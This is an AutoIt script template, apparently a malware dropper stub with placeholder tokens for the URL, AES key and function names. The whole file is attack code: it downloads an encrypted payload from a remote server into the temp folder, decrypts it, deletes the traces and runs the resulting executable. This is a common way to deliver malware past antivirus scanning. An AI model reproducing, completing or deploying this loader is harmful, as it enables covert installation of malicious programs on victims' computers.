#Include "AES.au3";;;;;
$serverFile = %%url%%;;;;;
$tmpEncFile = @TempDir & \%%temp1%%;;;;;
$tmpFile2 = @TempDir & \%%temp2%%;;;;;
$exeFile = @TempDir & \%%exeFile%%;;;;;
Local $sData = InetRead($serverFile);;;;;
Local $newfile = FileOpen($tmpEncFile,2);;;;;
$r = FileWrite($newfile, $sData);;;;;
While Not FileExists($tmpEncFile);;;;;
Sleep(1);;;;;
WEnd;;;;;
If FileExists($exeFile) Then;;;;;
FileDelete($exeFile);;;;;
EndIf;;;;;
$r=FileCopy($tmpEncFile, $tmpFile2);;;;;
Call(%%aesfunc%% & '', %%key%%, $tmpFile2, $exeFile, "CFB");;;;;
While Not FileExists($exeFile);;;;;
Sleep(1);;;;;
WEnd;;;;;
FileDelete($tmpEncFile);;;;;
FileDelete($tmpFile2);;;;;
Run($exeFile);;;;;
func %%b2s%%($binary);;;;;
return BinaryToString($binary);;;;;
endfunc;;;;;